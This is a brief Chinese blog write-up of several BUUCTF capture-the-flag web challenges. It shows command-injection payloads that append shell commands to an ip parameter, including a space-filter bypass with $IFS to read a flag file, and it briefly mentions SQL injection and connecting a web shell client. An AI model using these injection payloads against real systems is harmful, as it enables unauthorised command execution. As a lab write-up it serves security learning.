buuctf刷题

[GXYCTF2019]Ping Ping Ping

这还是一道命令执行的题目
?ip=127.0.0.1;ls
image
?ip=127.0.0.1;cat flag
image
这里提示我们空格被过滤了
我们开始构建合适的payload
?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php
image

lovesql1

这是一道标准的sql注入题目group_concat是集合输出字段

极客大挑战 2019]Knife

image
连接caidao
得到flagimage

极客大挑战 2019]Http

posted @ 2022-05-10 22:44  smart_ql  阅读(22)  评论(0编辑  收藏  举报